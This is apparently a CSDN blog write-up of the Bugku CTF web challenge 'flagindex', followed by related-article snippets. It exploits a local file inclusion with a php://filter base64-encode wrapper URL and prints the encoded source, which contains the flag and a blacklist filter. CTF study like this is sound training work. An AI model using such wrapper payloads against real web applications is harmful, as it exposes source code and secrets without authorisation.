bugku_web flag在index里

最新推荐文章于 2024-03-26 20:56:09 发布
最新推荐文章于 2024-03-26 20:56:09 发布
阅读量588 收藏 1
点赞数
分类专栏: bugku wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/didid_w/article/details/80161071
版权

打开网页:

点击之后url变成了:


看到?file=show.php在结合题目 flag在index里 很容易想到文件包含

试试:http://120.24.86.145:8005/post/index.php?file=file_get_contents(index.php)


在试了其他的文件读取函数发现什么都没输出,说明可能有过滤条件得绕过过滤

通过php伪协议利用PHP://filter/read=convert.base64-encode/resource=xxx将文件的base64加密后读取出来,达到绕过过滤的目的

http://120.24.86.145:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php



得到一段base64加密后的数据:

PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LWN0ZjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2VkdWxjbmlfZWxpZl9sYWNvbF9zaV9zaWh0fQ0KPz4NCjwvaHRtbD4NCg==

解密后得到flag










didid_w
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Bugku Web CTF-flagIndex
No Title
12-09 953
Bugku Web CTF-flagIndex 查看网页源码。 <html> <title>Bugku-ctf</title> <a href="./index.php?file=show.php">click me? no</a></html> 观察URL的格式,让人联想到文件包含漏洞。然而并没有看到...
bugkuctf解题-WEB
05-04
在CTF(Capture The Flag)比赛中,Web安全领域是一个重要的环节,它涵盖了各种网络安全技能,如漏洞挖掘、代码审计、Web应用渗透测试等。本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验...
Bugku_web(一)
weixin_44087538的博客
03-26 463
根据您之前提到的代码片段,当$num被赋值为'1abc'时,is_numeric($num)会返回true,因为'1abc'包含一个有效的数字开头。需要注意的是,POST请求没有长度限制,因此可以传输大量数据,但也需要注意数据的编码和格式,以确保服务器能够正确解析和处理。在解题过程中,保持冷静和专注,不断尝试和学习,你会逐渐提高自己的解题能力。,最终都是index.php,如果文件夹下没有index页,就会列出当前目录下所有文件,这个就比较危险了,当然,可以通过服务器设置权限,避免被人看到你的网站结构。
Bugkuweb flagindex
qq_26961571的博客
06-23 867
这道题本来以为是简单抓包题,没想到是文件包含题目,让我打开了新世界大门。 老规矩,先打开他要求的网页查看。 查看源代码。 并没有什么东西。 点击了之后也是出现一行字。 源代码也没有任何东西。 这时候想到抓包,看了老半天的包,面也是啥都没发现。只能百度了 百度说这是文件包含漏洞,给了一串url命令,主要是让file=index的意思,这岂不是完全依赖于题目提示了,看来题目还是非常关键的东西。 http://123.206...
BugKuCTF WEB flagindex
无限迭代中......
07-09 555
http://123.206.87.240:8005/post/ 题解:本地文件包含漏洞+php伪协议的结合应用 原理:php的封装协议:http://php.net/manual/zh/wrappers.php.php 点击 URL http://123.206.87.240:8005/post/index.php?file=show.php 文件包含漏洞 URL ...
Bugku web14 flagindex
weixin_44522540的博客
02-23 183
十三、web14 flagindex 文件包含漏洞+php伪协议 php://filter 该伪协议可以读取php文件代码以base64编码输出,比如说我们想读取一个php文件但是不想让它正常php执行代码后的结果,我们想要这个php文件的代码的时候就可以使用这个伪协议。 使用方法:php://filter/read=convert.base64-encode/resource=需要读取源码的文件名 ① file=php://filter/read=convert.base64-encode/r
Bugku web——flagindex
qq_40481505的博客
09-04 369
打开题目链接,点击“click me”,发现其连接为: http://123.206.87.240:8005/post/index.php?file=show.php 说明index.php使用了文件包含,因此可以利用php文件包含漏洞 此漏洞有下面几种利用方法 php://filter 使用方法:http://123.206.87.240:8005/post/index.php?file=p...
BUGKU_WEB_newphp
weixin_50076644的博客
07-29 184
bugku的题目wp
ctf提示flag在php,BugkuCTF:flagindex;输入密码查看flag
weixin_39952502的博客
03-27 1657
flagindex题目是这样:点击之后是这样:url变成了:http://123.206.87.240:8005/post/index.php?file=show.php看到大佬的解答,因为有file字样,联想到文件包含:利用xxe漏洞,直接获得源码:可以用如下一行代码将POST内容转换成base64编码并输出:readfile("php://filter/read=convert.base6...
bugku web flagindex
thinszx的博客
03-09 259
题目描述 看到了点击以后的url,尝试了一下?file=index.php,结果失败,啥都没有,上网搜了一下题解,发现这是php中的伪协议 php伪协议 在php中,有
OS_FLAG.rar_os_flag
09-23
3. 任务调度:`OS_FLAG_INT_ENTER()`和`OS_FLAG_INT_EXIT()`分别表示进入和退出中断服务程序时的任务调度保护,确保任务切换的安全性。 4. 锁机制:源码中使用了中断禁止(OSIntEnter()和OSIntExit())和任务级互斥...
OS_FLAG.rar_flag uc
09-23
提到的“rar_flag uc”可能是指该压缩包包含了用于竞赛或挑战的“旗标”(Flag),在信息安全领域中,这种旗标通常代表完成某个任务或破解某个功能后的奖励标识。 在压缩包中,有两个文件: 1. **OS_FLAG.C** ...
Nauru.rar_Basically..._Nauru Flag
09-23
【标题】"Nauru.rar_Basically..._Nauru Flag" 提示我们这是一个与瑙鲁国旗相关的项目。瑙鲁是位于南太平洋的一个小岛国,其国旗代表着该国的文化、历史和国家象征。 【描述】"It's basically a flag code... Nauru...
破空_flag查找3.5.zip
01-29
【破空_flag查找3.5.zip】是一个针对CTF(Capture The Flag)竞赛的工具集,主要用于在各种挑战中寻找并解析"flag",即比赛的关键标识符。CTF是网络安全领域的一种比赛形式,参赛者需要通过解密、逆向工程、漏洞挖掘...
笔记222222222222222222222222222222
最新发布
08-04
笔记222222222222222222222222222222
仿拉钩App小程序.rar
08-04
小程序的设计源码通常包含多个文件和文件夹,组织结构清晰,以便开发者能够快速上手并进行定制化开发。主要文件和文件夹包括: 页面文件夹:存放小程序的各个页面,每个页面通常由.wxml、.wxss、.js和.json文件组成。WXML文件负责页面的结构,类似于HTML;WXSS文件负责样式,类似于CSS;JS文件负责页面的逻辑和交互;JSON文件用于页面的配置,如导航栏标题等。 组件文件夹:存放可复用的UI组件。组件与页面类似,也由.wxml、.wxss、.js和.json文件组成。通过组件化设计,可以提高代码的复用性和维护性,减少重复工作。 静态资源文件夹:存放图片、音频、视频等静态资源,便于在小程序中引用。这些资源通常放在一个名为assets或static的文件夹中。 配置文件:小程序的根目录下通常有一个app.json文件,用于全局配置,如页面路径、导航栏样式、底部Tab栏等。此外,还有app.wxss和app.js文件,分别用于全局样式和全局逻辑。 工具文件夹:存放一些工具函数和库文件,便于在小程序中调用。这些文件通常放在一个名为utils的文件夹中。
华云智慧园区.rar
08-04
小程序的设计源码通常包含多个文件和文件夹,组织结构清晰,以便开发者能够快速上手并进行定制化开发。主要文件和文件夹包括: 页面文件夹:存放小程序的各个页面,每个页面通常由.wxml、.wxss、.js和.json文件组成。WXML文件负责页面的结构,类似于HTML;WXSS文件负责样式,类似于CSS;JS文件负责页面的逻辑和交互;JSON文件用于页面的配置,如导航栏标题等。 组件文件夹:存放可复用的UI组件。组件与页面类似,也由.wxml、.wxss、.js和.json文件组成。通过组件化设计,可以提高代码的复用性和维护性,减少重复工作。 静态资源文件夹:存放图片、音频、视频等静态资源,便于在小程序中引用。这些资源通常放在一个名为assets或static的文件夹中。 配置文件:小程序的根目录下通常有一个app.json文件,用于全局配置,如页面路径、导航栏样式、底部Tab栏等。此外,还有app.wxss和app.js文件,分别用于全局样式和全局逻辑。 工具文件夹:存放一些工具函数和库文件,便于在小程序中调用。这些文件通常放在一个名为utils的文件夹中。
新浪读书.rar
08-04
小程序的设计源码通常包含多个文件和文件夹,组织结构清晰,以便开发者能够快速上手并进行定制化开发。主要文件和文件夹包括: 页面文件夹:存放小程序的各个页面,每个页面通常由.wxml、.wxss、.js和.json文件组成。WXML文件负责页面的结构,类似于HTML;WXSS文件负责样式,类似于CSS;JS文件负责页面的逻辑和交互;JSON文件用于页面的配置,如导航栏标题等。 组件文件夹:存放可复用的UI组件。组件与页面类似,也由.wxml、.wxss、.js和.json文件组成。通过组件化设计,可以提高代码的复用性和维护性,减少重复工作。 静态资源文件夹:存放图片、音频、视频等静态资源,便于在小程序中引用。这些资源通常放在一个名为assets或static的文件夹中。 配置文件:小程序的根目录下通常有一个app.json文件,用于全局配置,如页面路径、导航栏样式、底部Tab栏等。此外,还有app.wxss和app.js文件,分别用于全局样式和全局逻辑。 工具文件夹:存放一些工具函数和库文件,便于在小程序中调用。这些文件通常放在一个名为utils的文件夹中。
FlagStatus Key_0_Flag = RESET; FlagStatus Key_1_Flag = RESET; FlagStatus Key_2_Flag = RESET; FlagStatus Key_4_Flag = RESET; FlagStatus Key_5_Flag = RESET; FlagStatus Key_6_Flag = RESET; FlagStatus Key_7_Flag = RESET; FlagStatus Key_9_Flag = RESET; FlagStatus Key_up_Flag = RESET; FlagStatus Key_down_Flag = RESET; FlagStatus Key_left_Flag = RESET; FlagStatus Key_right_Flag = RESET; FlagStatus Key_F1_Flag = RESET; FlagStatus Key_F2_Flag = RESET; FlagStatus Key_return_Flag = RESET; FlagStatus Key_confirm_Flag = RESET; FlagStatus Key__Flag = RESET; //小数点 FlagStatus Key_backup_Flag = RESET; 什么意思
07-08
这些Flag变量可能用于表示按键的状态,其中包括Key_0_Flag、Key_1_Flag、Key_2_Flag、Key_4_Flag、Key_5_Flag、Key_6_Flag、Key_7_Flag、Key_9_Flag、Key_up_Flag、Key_down_Flag、Key_left_Flag、Key_right_Flag、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值